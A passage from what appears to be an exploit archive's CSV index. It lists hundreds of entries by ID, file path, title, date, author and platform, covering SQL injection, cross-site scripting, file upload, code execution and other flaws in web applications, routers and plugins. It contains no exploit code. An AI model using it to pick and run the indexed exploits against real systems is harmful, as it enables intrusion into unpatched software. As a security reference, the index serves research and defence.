Schurtz",webapps,php, +38143,exploits/php/webapps/38143.txt,"cPanel - 'account' Cross-Site Scripting",2012-12-24,"Rafay Baloch",webapps,php, +38144,exploits/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,webapps,php, +38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80 +38204,exploits/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",webapps,php, +38152,exploits/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,webapps,php, +38153,exploits/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html?acct' Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",webapps,php, +38154,exploits/php/webapps/38154.txt,"cPanel - 'detailbw.html' Multiple Cross-Site Scripting Vulnerabilities",2012-12-27,"Christy Philip Mathew",webapps,php, +38155,exploits/php/webapps/38155.txt,"WHM - 'filtername' Cross-Site Scripting",2012-12-27,"Rafay Baloch",webapps,php, +38156,exploits/php/webapps/38156.txt,"cPanel - 'dir' Cross-Site Scripting",2012-12-26,"Rafay Baloch",webapps,php, +38157,exploits/php/webapps/38157.txt,"WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",webapps,php, +38158,exploits/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php? reqID' SQL Injection",2013-01-01,"Sammy FORGIT",webapps,php, +38159,exploits/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID' SQL Injection",2013-01-01,"Sammy FORGIT",webapps,php, +38160,exploits/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID' SQL Injection",2013-01-01,"Sammy FORGIT",webapps,php, +38161,exploits/php/webapps/38161.txt,"osTicket - 'l.php?url' Arbitrary Site Redirect",2013-01-02,AkaStep,webapps,php, +38162,exploits/php/webapps/38162.txt,"osTicket - 'tickets.php?status' Cross-Site Scripting",2013-01-02,AkaStep,webapps,php, +38163,exploits/php/webapps/38163.txt,"WordPress Plugin Uploader - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",webapps,php, +38166,exploits/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,webapps,php, +38167,exploits/php/webapps/38167.php,"Multiple WordPress WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,webapps,php, +38168,exploits/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",webapps,php, +38169,exploits/php/webapps/38169.txt,"Havalite CMS - 'comment' HTML Injection",2013-01-06,"Henri Salo",webapps,php, +38171,exploits/php/webapps/38171.txt,"Joomla! Component com_incapsula - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",webapps,php, +38178,exploits/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Cross-Site Scripting",2013-01-08,Am!r,webapps,php, +38173,exploits/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,webapps,multiple, +38174,exploits/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,webapps,multiple, +38176,exploits/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",webapps,php, +38182,exploits/php/webapps/38182.txt,"tinybrowser - 'type' Cross-Site Scripting",2013-01-09,MustLive,webapps,php, +38183,exploits/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,webapps,php, +38184,exploits/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,webapps,php, +38187,exploits/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",webapps,php,80 +38188,exploits/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,webapps,jsp,80 +38189,exploits/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,webapps,jsp, +38190,exploits/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,webapps,jsp,80 +38191,exploits/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-09-15,hyp3rlinx,webapps,jsp,80 +38192,exploits/jsp/webapps/38192.txt,"Openfire 3.10.2 - Cross-Site Request Forgery",2015-09-15,hyp3rlinx,webapps,jsp,80 +38197,exploits/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,webapps,php,80 +38207,exploits/php/webapps/38207.txt,"Quick.CMS / Quick.Cart - Cross-Site Scripting",2013-01-09,"High-Tech Bridge",webapps,php, +38209,exploits/php/webapps/38209.txt,"WordPress Plugin Gallery - 'filename_1' Arbitrary File Access",2013-01-10,Beni_Vanda,webapps,php, +38210,exploits/php/webapps/38210.txt,"Kirby CMS 2.1.0 - Cross-Site Request Forgery / Content Upload / PHP Script Execution",2015-09-22,"Dawid Golunski",webapps,php, +38256,exploits/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted Arbitrary File Upload",2015-09-22,rTheory,webapps,php,80 +38258,exploits/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,webapps,ios,8000 +38213,exploits/php/webapps/38213.txt,"FAROL - SQL Injection",2015-09-16,"Thierry Fernandes Faria",webapps,php,80 +38223,exploits/php/webapps/38223.txt,"ZeusCart 4.0 - Cross-Site Request Forgery",2015-09-17,"Curesec Research Team",webapps,php,80 +38224,exploits/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",webapps,php,80 +38228,exploits/php/webapps/38228.txt,"phpLiteAdmin - 'table' SQL Injection",2013-01-15,KedAns-Dz,webapps,php, +38229,exploits/php/webapps/38229.txt,"IP.Gallery - 'img' SQL Injection",2013-01-17,"Ashiyane Digital Security Team",webapps,php, +38231,exploits/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting",2013-01-20,3spi0n,webapps,php, +38234,exploits/php/webapps/38234.txt,"DigiLIBE - Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",webapps,php, +38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",webapps,jsp, +38236,exploits/php/webapps/38236.txt,"gpEasy CMS - 'section' Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",webapps,php, +38237,exploits/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Vulnerabilities",2013-01-23,"Eugene Dokukin",webapps,php, +38238,exploits/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections",2013-01-25,AkaStep,webapps,php, +38241,exploits/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,webapps,php,80 +38245,exploits/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,webapps,hardware, +38246,exploits/php/webapps/38246.txt,"iCart Pro - 'section' SQL Injection",2013-01-25,n3tw0rk,webapps,php, +38251,exploits/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Cross-Site Scripting",2013-01-24,hiphop,webapps,php, +38255,exploits/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",webapps,php,80 +38261,exploits/xml/webapps/38261.txt,"SAP NetWeaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",webapps,xml, +38290,exploits/php/webapps/38290.txt,"WordPress Theme flashnews - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,webapps,php, +38291,exploits/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",webapps,php, +38292,exploits/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",webapps,php, +38294,exploits/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,webapps,php, +38295,exploits/php/webapps/38295.txt,"ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-06,L0n3ly-H34rT,webapps,php, +38296,exploits/php/webapps/38296.txt,"WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting",2013-02-06,"High-Tech Bridge",webapps,php, +38297,exploits/php/webapps/38297.txt,"WordPress Plugin Wysija Newsletters - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",webapps,php, +38300,exploits/php/webapps/38300.txt,"WordPress Plugin Audio Player - 'playerID' Cross-Site Scripting",2013-01-31,hiphop,webapps,php, +38301,exploits/php/webapps/38301.txt,"WordPress Theme Pinboard - 'tab' Cross-Site Scripting",2013-02-09,"Henrique Montenegro",webapps,php, +38304,exploits/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration",2015-09-24,"Filippo Roncari",webapps,php, +38309,exploits/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",webapps,php, +38311,exploits/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,webapps,php, +40882,exploits/php/webapps/40882.txt,"Edge SkateShop - Authentication bypass",2016-12-06,Delilah,webapps,php, +38314,exploits/php/webapps/38314.txt,"WordPress Plugin NextGEN Gallery - Full Path Disclosure",2013-02-14,"Henrique Montenegro",webapps,php, +38315,exploits/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,webapps,php, +38316,exploits/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,webapps,cgi, +38318,exploits/asp/webapps/38318.txt,"MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",webapps,asp, +38320,exploits/php/webapps/38320.txt,"Squirrelcart - 'table' Cross-Site Scripting",2013-02-19,"Gjoko Krstic",webapps,php, +38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,webapps,php,80 +38322,exploits/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,webapps,php, +38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80 +38324,exploits/php/webapps/38324.txt,"WordPress Plugin Pretty Link - Cross-Site Scripting",2013-02-20,hiphop,webapps,php, +38326,exploits/php/webapps/38326.txt,"ZenPhoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,webapps,php, +38327,exploits/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,webapps,php, +38328,exploits/php/webapps/38328.txt,"OpenEMR - 'site' Cross-Site Scripting",2013-02-21,"Gjoko Krstic",webapps,php, +38329,exploits/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Cross-Site Scripting",2013-02-20,MustLive,webapps,php, +38331,exploits/php/webapps/38331.txt,"WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",webapps,php, +38332,exploits/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,webapps,php, +38333,exploits/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,webapps,php, +38334,exploits/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,webapps,jsp, +38335,exploits/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",webapps,php, +38338,exploits/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,jsp,80 +38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,php,80 +38342,exploits/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - Local File Inclusion",2015-09-28,Vulnerability-Lab,webapps,ios,8080 +38343,exploits/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,webapps,ios, +38345,exploits/php/webapps/38345.txt,"vTiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",webapps,php,80 +38350,exploits/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection",2015-09-29,absane,webapps,hardware, +38351,exploits/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",webapps,asp, +38354,exploits/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",webapps,php, +38355,exploits/php/webapps/38355.txt,"WordPress Plugin Uploader - 'blog' Cross-Site Scripting",2013-03-01,CodeV,webapps,php, +38358,exploits/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",webapps,java, +38359,exploits/php/webapps/38359.txt,"WordPress Plugin Count Per Day - 'daytoshow' Cross-Site Scripting",2013-03-05,alejandr0.m0f0,webapps,php, +38363,exploits/php/webapps/38363.txt,"File Manager - HTML Injection / Local File Inclusion",2013-02-23,"Benjamin Kunz Mejri",webapps,php, +38366,exploits/multiple/webapps/38366.py,"Verax NMS - Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",webapps,multiple, +38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",webapps,php, +38369,exploits/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection",2015-10-01,neom22,webapps,hardware, +38372,exploits/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,webapps,php, +38373,exploits/php/webapps/38373.txt,"WordPress Plugin Terillion Reviews - Profile Id HTML Injection",2013-03-08,"Aditya Balapure",webapps,php, +38374,exploits/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,webapps,php, +38375,exploits/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",webapps,php, +38376,exploits/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,webapps,php, +38377,exploits/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure",2013-03-11,"Chris John Riley",webapps,php, +38379,exploits/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,webapps,windows, +38380,exploits/windows/webapps/38380.txt,"FTGate 7 - Cross-Site Request Forgery",2015-10-02,hyp3rlinx,webapps,windows, +38383,exploits/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",webapps,linux,9200 +38385,exploits/php/webapps/38385.txt,"KindEditor - Multiple Arbitrary File Upload Vulnerabilities",2013-03-11,KedAns-Dz,webapps,php, +38386,exploits/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,webapps,php, +38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,webapps,php, +38393,exploits/php/webapps/38393.html,"WordPress Plugin Occasions - Cross-Site Request Forgery",2013-03-19,m3tamantra,webapps,php, +38395,exploits/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal",2015-10-05,xistence,webapps,jsp,8080 +38537,exploits/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,webapps,php, +38400,exploits/php/webapps/38400.txt,"Alienvault Open Source SIEM (OSSIM) 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",webapps,php, +38406,exploits/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",webapps,php, +38407,exploits/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",webapps,php, +38408,exploits/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,webapps,php, +38409,exploits/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure",2015-10-06,"Todor Donev",webapps,hardware, +38410,exploits/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",webapps,php, +38411,exploits/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,webapps,python, +38413,exploits/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,webapps,php, +38414,exploits/php/webapps/38414.txt,"WordPress Plugin Feedweb - 'wp_post_id' Cross-Site Scripting",2013-03-30,"Stefan Schurtz",webapps,php, +40407,exploits/aspx/webapps/40407.txt,"Microix Timesheet Module - SQL Injection",2016-09-22,"Anthony Cole",webapps,aspx, +38415,exploits/asp/webapps/38415.txt,"C2 WebResource - 'File' Cross-Site Scripting",2013-04-03,anonymous,webapps,asp, +38416,exploits/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",webapps,php, +38417,exploits/php/webapps/38417.txt,"Symphony - 'sort' SQL Injection",2013-04-03,"High-Tech Bridge",webapps,php, +38418,exploits/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",webapps,php, +38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple, +38425,exploits/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38426,exploits/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38427,exploits/php/webapps/38427.txt,"PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",webapps,php, +38428,exploits/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php?site' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38429,exploits/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",webapps,php, +38430,exploits/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",webapps,php, +38431,exploits/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php?BasicLogin' Cookie SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38432,exploits/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php?var' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38433,exploits/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php?email' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38434,exploits/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38435,exploits/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php?q' SQL Injection",2013-04-05,"Jurgen Voorneveld",webapps,php, +38436,exploits/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",webapps,php, +38438,exploits/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,webapps,php, +38439,exploits/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting",2013-04-09,Beni_Vanda,webapps,php, +38440,exploits/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,webapps,php, +38441,exploits/php/webapps/38441.txt,"WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection",2013-04-10,"Ashiyane Digital Security Team",webapps,php, +38443,exploits/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",webapps,php, +38445,exploits/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",webapps,php, +38446,exploits/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,webapps,php, +38448,exploits/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",webapps,hardware, +38449,exploits/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware, +38450,exploits/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",webapps,php, +38455,exploits/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",webapps,hardware, +38476,exploits/php/webapps/38476.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",webapps,php, +38477,exploits/php/webapps/38477.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple SQL Injections",2013-04-14,"Chiekh Bouchenafa",webapps,php, +38458,exploits/php/webapps/38458.txt,"WordPress Plugin Spider Video Player - 'theme' SQL Injection",2013-04-11,"Ashiyane Digital Security Team",webapps,php, +38459,exploits/php/webapps/38459.txt,"Request Tracker - 'ShowPending' SQL Injection",2013-04-11,cheki,webapps,php, +38460,exploits/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",webapps,jsp, +38461,exploits/java/webapps/38461.txt,"Hero Framework - '/users/login?Username' Cross-Site Scripting",2013-04-10,"High-Tech Bridge",webapps,java, +38462,exploits/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password?error' Cross-Site Scripting",2013-04-10,"High-Tech Bridge",webapps,java, +38463,exploits/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,webapps,multiple, +38470,exploits/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",webapps,hardware, +38471,exploits/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",webapps,hardware, +38478,exploits/php/webapps/38478.txt,"Sosci Survey - Multiple Vulnerabilities",2013-04-17,"T. Lazauninkas",webapps,php, +38479,exploits/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,webapps,asp, +38480,exploits/php/webapps/38480.txt,"Fork CMS - 'js.php' Local File Inclusion",2013-04-18,"Rafay Baloch",webapps,php, +38482,exploits/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,webapps,php, +38484,exploits/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,webapps,php, +38487,exploits/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,webapps,php, +38488,exploits/hardware/webapps/38488.txt,"Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",webapps,hardware, +38491,exploits/php/webapps/38491.php,"SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",webapps,php, +38494,exploits/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,webapps,php, +38496,exploits/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,webapps,php, +38497,exploits/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Blind SQL Injections",2015-10-19,LiquidWorm,webapps,php, +38499,exploits/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",webapps,php, +38506,exploits/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",webapps,php, +38507,exploits/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",webapps,php, +38508,exploits/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,webapps,php, +38509,exploits/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",webapps,php, +38510,exploits/php/webapps/38510.txt,"WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",webapps,php, +38511,exploits/php/webapps/38511.txt,"Gallery Server Pro - Arbitrary File Upload",2013-05-14,"Drew Calcott",webapps,php, +38514,exploits/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution",2015-10-22,Photubias,webapps,hardware, +38515,exploits/php/webapps/38515.txt,"WordPress Plugin wp-FileManager - 'path' Arbitrary File Download",2013-05-15,ByEge,webapps,php, +38516,exploits/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Cross-Site Scripting",2013-05-14,"Deepankar Arora",webapps,php, +38517,exploits/php/webapps/38517.html,"WordPress Plugin Mail On Update - Cross-Site Request Forgery",2013-05-16,"Henri Salo",webapps,php, +38518,exploits/php/webapps/38518.txt,"Jojo CMS - 'search' Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",webapps,php, +38519,exploits/php/webapps/38519.txt,"Jojo CMS - 'x-forwarded-for' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",webapps,php, +38520,exploits/php/webapps/38520.html,"WordPress Plugin WP Cleanfix - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",webapps,php, +38523,exploits/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,webapps,php, +38524,exploits/php/webapps/38524.pl,"Matterdaddy Market - Multiple Vulnerabilities",2013-05-24,KedAns-Dz,webapps,php, +38525,exploits/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,webapps,php, +38527,exploits/php/webapps/38527.txt,"Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",webapps,php, +38528,exploits/php/webapps/38528.txt,"Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",webapps,php, +38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php, +38534,exploits/php/webapps/38534.php,"Joomla! 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",webapps,php, +38645,exploits/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,webapps,jsp, +38543,exploits/php/webapps/38543.txt,"PHP4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",webapps,php, +38544,exploits/php/webapps/38544.txt,"Elastix - Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,webapps,php, +38545,exploits/php/webapps/38545.txt,"Telaen 2.7.x - Cross-Site Scripting",2013-06-04,"Manuel García Cárdenas",webapps,php, +38546,exploits/php/webapps/38546.txt,"Telaen 2.7.x - 